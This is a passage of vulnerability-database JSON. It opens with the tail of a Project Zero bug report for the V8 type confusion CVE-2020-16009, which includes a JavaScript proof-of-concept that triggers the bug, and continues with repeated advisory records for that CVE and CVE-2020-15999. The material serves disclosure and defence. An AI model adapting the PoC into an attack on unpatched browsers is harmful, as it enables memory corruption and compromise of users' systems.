also generalize map2 since it is deprecated.\n4. Execute the JIT code. This will effectively transition from map1{a:tagged} to map2{a:double,b:whatever}, which is incorrect and results in a type confusion.\n\nThe following code achieves that and causes a check failure in debug builds: \\\"Debug check failed: value.IsHeapNumber().\\\" while printing (presumably) an address in release builds.\n\nREPRODUCTION CASE\n// Tested on v8 built from current HEAD (dd84c3937058b086b6b7a412ac352179e20bd9c7)\n// Requires --allow-natives-syntax\n\nfunction assert(c) {\n if (!c) { throw \\\"Assertion failed\\\"; }\n}\n\nfunction assertFalse(c) {\n assert(!c);\n}\n\nfunction poc() {\n function hax(o) {\n o.c = 13.37;\n }\n\n function makeObjWithMap5() {\n let o = {};\n o.a = 13.37;\n o.b = {};\n return o\n }\n\n // Create a bunch of Maps. See the assertions for their relationships\n\n let m1 = {};\n\n let m2 = {};\n assert(%HaveSameMap(m2, m1));\n m2.a = 13.37;\n\n let m3 = {};\n m3.a = 13.37;\n assert(%HaveSameMap(m3, m2));\n m3.b = 1;\n\n let m4 = {};\n m4.a = 13.37;\n m4.b = 1;\n assert(%HaveSameMap(m4, m3));\n m4.c = {};\n\n let m4_2 = {};\n m4_2.a = 13.37;\n m4_2.b = 1;\n m4_2.c = {};\n assert(%HaveSameMap(m4_2, m4));\n\n let m5 = {};\n m5.a = 13.37;\n assert(%HaveSameMap(m5, m2));\n m5.b = 13.37;\n assertFalse(%HaveSameMap(m5, m3));\n\n // At this point, Map3 and Map4 are both deprecated. Map2 transitions to Map5.\n // Map5 is the migration target for Map3. The Migration target for Map4 is a new Map\n assertFalse(%HaveSameMap(m5, m3));\n\n let m6 = makeObjWithMap5();\n assert(%HaveSameMap(m6, m5));\n hax(m6);\n\n let kaputt = makeObjWithMap5();\n assert(%HaveSameMap(kaputt, m5));\n\n for (let i = 0; i < 100000; i++) {\n let o = i == 1337 ? makeObjWithMap5() : m6;\n hax(o);\n }\n\n // Map4 is deprecated, so this property access triggers a Map migration.\n // This will end up creating a new Map, Map7, to which both Map4 and Map6\n // migrate. Map5's transition entry afterwards points to Map7 and no\n // longer to Map6. Map6 is deprecated.\n let m7 = m4_2;\n assert(%HaveSameMap(m7, m4));\n m7.c;\n assertFalse(%HaveSameMap(m7, m4));\n\n // However, hax was not deoptimized and still transitions to Map6 because\n // Map::CanBeDeprecated returns false for it.\n\n // This does a in-place map generalization of Map5 and Map7, but not Map6.\n // Map6 still indicates that .a should be a double field.\n kaputt.a = \\\"asdf\\\";\n assert(%HaveSameMap(kaputt, m5));\n\n // This now migrates to the wrong map (Map6) because hax was not deoptimized.\n // This is incorrect because .a now stores a HeapObject and not a double.\n hax(kaputt);\n\n // This now fails in debug builds\n %HeapObjectVerify(kaputt);\n\n // This prints (presumably) an address in release builds\n console.log(kaputt.a);\n}\n%NeverOptimizeFunction(poc);\n\npoc();\n\n\nCREDIT INFORMATION\nClement Lecigne of Google's Threat Analysis Group and Samuel Gro\\u00df of Google Project Zero\n\nNOTE: We have evidence that the following bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline.\n\n[1] https://source.chromium.org/chromium/chromium/src/+/master:v8/src/compiler/compilation-dependencies.cc;l=641;drc=b4ed955a8e69c4f5fad8fc5ead483571298f1a81;bpv=1;bpt=1\n[2] https://source.chromium.org/chromium/chromium/src/+/master:v8/src/objects/map-inl.h;l=563;drc=b4ed955a8e69c4f5fad8fc5ead483571298f1a81;bpv=1;bpt=1\n\n\nRelated CVE Numbers: CVE-2020-16009.\n", "sourceHref": "https://0day.today/exploit/35211", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gitlab": [{"lastseen": "2022-06-09T23:08:40", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "gitlab", "title": "Access of Resource Using Incompatible Type ('Type Confusion')", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-12-02T00:00:00", "id": "GITLAB-33FB34DF8FCDE663648620E2D0DB1C01", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf.HwndHost%2FCVE-2020-16009.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:09:34", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "gitlab", "title": "Access of Resource Using Incompatible Type ('Type Confusion')", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-12-02T00:00:00", "id": "GITLAB-98A9E708DB5E4D4010801900DD41B093", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.WinForms%2FCVE-2020-16009.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:09:22", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "gitlab", "title": "Access of Resource Using Incompatible Type ('Type Confusion')", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-12-02T00:00:00", "id": "GITLAB-57D5CB9EB1311D6803E54E131F70D80E", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf%2FCVE-2020-16009.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:08:29", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "gitlab", "title": "Access of Resource Using Incompatible Type ('Type Confusion')", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-12-02T00:00:00", "id": "GITLAB-8236CCC6A902AC7ECFE2B7056937506F", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Common%2FCVE-2020-16009.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:08:27", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-27T00:00:00", "type": "gitlab", "title": "Out-of-bounds Write", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-27T00:00:00", "id": "GITLAB-0D82490E586EFE9A8135FB348CC1AD86", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Common%2FCVE-2020-15999.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-09T23:09:16", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-27T00:00:00", "type": "gitlab", "title": "Out-of-bounds Write", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-27T00:00:00", "id": "GITLAB-6BE09606720F800C863D5D69D459E60F", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf%2FCVE-2020-15999.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-09T23:08:38", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-27T00:00:00", "type": "gitlab", "title": "Out-of-bounds Write", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-27T00:00:00", "id": "GITLAB-8F1B32BA01379FD4F3C2BD10C978DA9A", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf.HwndHost%2FCVE-2020-15999.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-09T23:09:32", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-27T00:00:00", "type": "gitlab", "title": "Out-of-bounds Write", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-27T00:00:00", "id": "GITLAB-A09C40C419EC540F29571BE33E54126D", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.WinForms%2FCVE-2020-15999.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2023-01-28T06:04:16", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T03:15:00", "type": "debiancve", "title": "CVE-2020-16009", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-03T03:15:00", "id": "DEBIANCVE:CVE-2020-16009", "href": "https://security-tracker.debian.org/tracker/CVE-2020-16009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-17T06:05:53", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-11-03T03:15:00", "type": "debiancve", "title": "CVE-2020-15999", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-11-03T03:15:00", "id": "DEBIANCVE:CVE-2020-15999", "href": "https://security-tracker.debian.org/tracker/CVE-2020-15999", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:13", "description": "A type confusion vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-25T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Type Confusion (CVE-2020-16009)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-25T00:00:00", "id": "CPAI-2020-1206", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:27", "description": "A memory corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-24T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Memory Corruption (CVE-2020-15999)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-24T00:00:00", "id": "CPAI-2020-1069", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:32", "description": "Google has released Chrome version 86.0.4240.183 for Windows, Mac, and Linux addressing multiple vulnerabilities, including vulnerability CVE-2020-16009. Exploit code for this vulnerability exists in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Chrome Release Note](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) and apply the necessary updates immediately.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/11/03/google-releases-security-updates-chrome-cve-2020-16009>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-03T00:00:00", "type": "cisa", "title": "Google Releases Security Updates for Chrome, CVE-2020-16009", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-03T00:00:00", "id": "CISA:62CB6551A83E6AE3565CB9B75D07D5A7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/11/03/google-releases-security-updates-chrome-cve-2020-16009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T15:39:03", "description": "chromium, sid is vulnerable to Denial of Service(DoS). Inappropriate implementation in V8 in Google Chrome allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-21T18:50:30", "type": "veracode", "title": "Denial Of Service(DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2021-01-07T15:57:06", "id": "VERACODE:28657", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28657/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T16:46:17", "description": "FreeType is vulnerable to heap-based buffer overflow due to integer truncation in Load_SBit_Png.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-10-25T12:34:11", "type": "veracode", "title": "Heap Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2021-03-09T05:46:58", "id": "VERACODE:27664", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27664/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-26T16:49:40", "description": "FreeType is vulnerable to heap-based buffer overflow due to integer truncation in Load_SBit_Png.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-11-05T03:17:59", "type": "veracode", "title": "Heap Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 